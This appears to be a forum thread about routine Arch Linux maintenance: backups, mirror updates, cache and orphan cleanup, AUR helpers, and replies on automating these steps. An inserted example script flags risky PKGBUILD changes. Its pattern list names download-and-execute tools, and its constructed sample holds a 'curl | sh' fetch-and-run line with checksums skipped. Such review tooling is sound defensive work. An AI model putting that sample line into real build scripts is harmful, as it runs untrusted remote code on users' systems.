Hello. Please critique how I’m updating / maintaining my new Arch installation so I can fix anything I’m doing wrong. This is mostly what I could gather from the Arch wiki tailored to my system. I think I know what I’m doing - but as I’ve often learned, it’s easy to misunderstand or overlook some things.
Step 1: perform an incremental full system backup so I have something to restore if the update borks anything. I’ve chosen to use the rsync command as laid out on the wiki:
sudo rsync -aAXHv --delete --exclude={"/dev/*","/proc/*","/sys/*","/tmp/*","/run/*","/mnt/*","/media/*","/lost+found"} / /media/linuxhdd/archrsyncbackup
I have a large hdd mounted as a secondary drive under /media/linuxhdd. It is configured to automatically mount from fstab using uuid. Both my root drive and that hdd are formatted ext4. I’m not using the -S option because I don’t think I’ll be using virtual machines (I have other hard drives I can make bootable). --delete is used so I maintain one current set of files for restore purposes. This keeps the copying and transfer time to a minimum. (I maintain disk images offline with a different tool - this is simply one local copy for easy restoration purposes)
Step 2: Check the Arch wiki - follow instructions for any manual steps
Step 3: once every 1-2 months, update the mirror list using reflector
sudo reflector --protocol https --verbose --latest 25 --sort rate --save /etc/pacman.d/mirrorlist
This should sort the fastest 25 mirrors into mirrorlist. Remember to use the -Syyu option in step 6 if this step was done
Step 4: Clean the journal
sudo journalctl --vacuum-time=4weeks
This should keep 4 weeks of files.
Step 5: Clean the cache
sudo paccache -r
This should keep no more than 3 versions lying around. Once in a while, I can clean out all uninstalled packages with -ruk0 options instead.
Step 6: Upgrade Arch packages with pacman
sudo pacman -Syu
I need to watch for pacnew and pacsave files and deal with them (although I haven’t seen any yet)
Step 7: Review the pacman log
nano /var/log/pacman.log
This should tell me about any warnings, errors, instructions, or other things I need to deal with.
Step 8: Remove Orphans
pacman -Qtdq | sudo pacman -Rns -
This could be recursive and needs to be run more than once. Instead, I’ll just run it once every time I update. This should keep things cleaned out.
Step 9: Update AUR packages
Check the build scripts to make sure the package hasn’t been taken over and that it won’t run anything funny.
yay -Sua
This should update just the AUR packages
Step 10: Remove AUR orphans
yay -Yc
The wiki says this “removes unnecessary dependencies” which I believe means AUR-only orphan packages.
Step 11: Reboot
reboot
Step 12: Update flatpaks from the GUI (Gnome --> Software --> Updates)
Any mistakes? Suggestions?
Thanks!
Just so that you have an additional data point, here’s how I do it.
I run a backup first, using borg-backup. I used rsync in the past, then rsnapshot and now borg since it allows for compressed incremental backups, diffing on the “chunk” level, meaning I won’t back up the entirety of a modified file again and save a lot of space.
I used yay before, but like you I didn’t want to go into it blindly and do some modicum of sanity-checking the PKGBUILD for changes beforehand. Since it wasn’t obvious on what would be the best way of using yay for doing this, I asked around on the ArchLinux Forum, and ultimately decided to try one of the simpler tools suggested in the Arch Wiki, aurutils.
After setting it up (the author helped me migrate), I now use it as follows:
- aur repo --upgrades: Searches for new versions of aur packages and displays them
- aur sync --upgrades --no-build: Performs a git-pull under ~/.cache/aurutils/sync and opens vifm so that I can look at a diff of the PKGBUILD and all the other changes in the affected directory.
- aur sync --upgrades --no-view: Builds the package. It is now available as part of the custom (local) repository used only for aur packages, but hasn’t been upgraded yet. That is, a package.tar.gz or whatever has been created and put into ~/.cache/aurutils/sync/, where the PKGBUILD resides as well
- sudo pacman -Syu: Upgrades all packages from all repositories, including the ones from the custom repository
I won’t argue pro or against one aur helper or the other, but I feel like I have a little more insight about what happens under the hood since I made the switch. That being said, in the very beginning, I managed aur packages manually. This works also, but at some point became too tedious for my taste. I am happy with the semi-automatic approach I am using now.
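Reviewing what changed in a PKGBUILD before building, as the posts above describe, can start from the lines that matter most. This is an added example (not code from the posters, yay or aurutils): a shell function that diffs two PKGBUILD revisions and flags added lines touching the maintainer, sources, checksums, install scripts or download-and-execute commands. The function names, the pattern list and both sample PKGBUILDs are constructed for illustration.

```shell
#!/bin/bash
# Added example: flag security-relevant lines added between two PKGBUILD revisions.
# The pattern list is this example's own starting checklist, not a complete detector.

pkgbuild_review() {   # usage: pkgbuild_review OLD_PKGBUILD NEW_PKGBUILD
    # Keep only lines present in the new revision ("+" side, minus the +++ header).
    added=$(diff -U0 "$1" "$2" | grep '^+[^+]' | cut -c2- || true)
    if [ -z "$added" ]; then echo "OK: no added lines"; return 0; fi
    flagged=0
    flag() {          # flag LABEL EXTENDED_REGEX: print matching added lines
        hits=$(printf '%s\n' "$added" | grep -E -- "$2" | sed "s/^/[$1] /" || true)
        if [ -n "$hits" ]; then printf '%s\n' "$hits"; flagged=1; fi
    }
    flag MAINTAINER '^# *Maintainer:'                      # package changed hands
    flag SOURCE     '^[[:space:]]*(source|url)[a-z0-9_]*=' # new download origin
    flag CHECKSUM   'SKIP'                                 # integrity check disabled
    flag INSTALL    '^[[:space:]]*install='                # script pacman runs as root
    flag FETCH-EXEC '(curl|wget|base64|eval|\| *(ba)?sh)'  # fetches or runs code
    if [ "$flagged" -eq 1 ]; then
        return 1      # non-zero: read the full diff before building
    fi
    echo "OK: no flagged lines"
}

make_samples() {      # writes two constructed PKGBUILD revisions into directory $1
    cat > "$1/old" <<'EOF'
# Maintainer: Alice Example <alice@example.org>
pkgname=hello-tool
pkgver=1.0
source=("https://example.org/hello-tool-1.0.tar.gz")
sha256sums=('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
build() { make; }
EOF
    cat > "$1/new" <<'EOF'
# Maintainer: Bob Example <bob@example.net>
pkgname=hello-tool
pkgver=1.1
source=("https://example.net/hello-tool-1.1.tar.gz")
sha256sums=('SKIP')
build() { curl -s https://example.net/setup | sh; make; }
EOF
}

demo_dir=$(mktemp -d)
make_samples "$demo_dir"
pkgbuild_review "$demo_dir/old" "$demo_dir/new" || echo "=> review needed"
```

A flagged line is not proof of tampering (VCS packages legitimately use SKIP, for instance); it only marks where to look first in the full diff.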
So yeah. If I needed a 12 step process to update my system it would still run kernel 4 :D (I’m lying of course) but I really don’t do as much as you and I don’t do more than necessary manually. Basically I run 2 commands to update:
- update which runs the update process more below.
- clean which removes orphans and cleans the cache
So update is the alias where the magic happens and it does the following:
- It runs sudo pacman -Syu checking with the Informant hook if there are any unread news, if so it stops the update. Otherwise it just runs through it.
- Then it runs pacdiff to check if any config files changed (I ran into an issue with that before where I didn’t check properly and suddenly couldn’t login anymore).
- Then, if flatpak is installed it will also update all flatpaks.
So my only manual intervention is “accepting” the news if there are any. Accepting the updates. And (if necessary) merging the pacnews. This way I have kept a fresh and stable system for a couple of years now.
TL;DR
I’d advise you to automate backups as incremental daily backups, automate reflector, clearing paccache and rebuilding initramfs/grub config.
- My system automatically backups at 4 am or boot time anyway, with basically the same command as you (also excluding games, caches 'n stuff).
- yay -Pw should show you unread news.
- reflector can be run as a systemd service
- For me, the journal never grew to a large size, despite not being cleared for any of my systems. Also useful for checking logs on systems where some errors may stay undetected for weeks, like servers (which I do run, successfully, without problems at all, on Arch testing repos. Even arch for arm works without any problems at all).
- There’s a pacman hook in the AUR that automatically clears the cache to the last three versions, or what you want. My yay cache is ~60 GB tho, which is more than the rest of my system combined. Still not an issue, as it is excluded for backups and I can just clear it or change the limit.
- As yay basically just invokes pacman -Syu, that step is actually pretty redundant.
- Errors should be outputted at runtime of pacman/yay, so as long as you don’t have 200 pkgs to update you could monitor normal and AUR packages at once.
- If packages are removed from dependencies they should be uninstalled automatically I believe and using pacman -Rs should remove packages that were only installed for the package you are removing. (Btw, -n removes config files too, if you don’t want them anymore). Despite that, I do check for orphans etc. when I feel like I want to clean my system(s).
- Just yay upgrades AUR and pacman pkgs, as said in 6.
- Just as 8, orphans shouldn’t happen anyway. Though I did not know about the AUR specific command, thank you!
- As I’m, not even joking, updating and “newest software” addicted, rebooting every time is very annoying, especially for servers. Luckily, as I update extremely often, it’s mostly very few packages so I can quickly decide if to reboot or not. In general, packages like screen or python can be ignored. Packages like sshd can be reloaded by just restarting the service (systemctl restart sshd). Only kernel, CPU-ucodes and drivers are a real update trigger for me.
- I don’t have flatpaks, and e.g. pip is redundant as my python packages are managed by pacman/yay. So it’s just yay to worry about.
Also, you missed a little but important step: Recompiling initramfs and the grub config (If you use grub, that is). If so, there’s also a hook for that.
Of course, just automating everything screams for errors and system crashes - if not checked. I’d also advise you to check systemctl status regularly, as it can inform you of failed (critical) services, like backups, DynDNS or just shadow.service informing you there’s a user missing/extra in /etc/shadow (which is the password file, btw).
In conclusion, many things could be done as service automatically, are redundant or could be done less often. Though I must say, it is better to do everything explicitly and with care, like you do, than to skip over things.
you can automate some parts of that away or can be combined
most AUR helper will basically invoke pacman -Syu internally before actually upgrading any AUR package (as otherwise this can lead to issues)
yay in particular can just be called via yay (no arguments) which is an alias of yay -Syu
Point 3: reflector.timer comes with reflector now and runs weekly by default, you need to configure and enable it though
https://wiki.archlinux.org/title/Reflector#systemd_timer
Point 4: you can restrict the journal size to much smaller than it is by default (10% of the partition size OR maximum 4 GB): https://wiki.archlinux.org/title/Systemd/Journal#Journal_size_limit
or alternatively set MaxRetentionSec to 2419200 seconds (4 weeks)
Point 5: can be done via pacman hook automatically after every upgrade
example: https://aur.archlinux.org/packages/pacman-cleanup-hook
there are also many other useful pacman hooks which tell you if there are any orphans or if AUR packages need to be rebuilt or there is a hook which reloads kernel modules after a kernel upgrade (which otherwise would warrant a reboot unless you are ready for the issues of many unloaded kernel modules)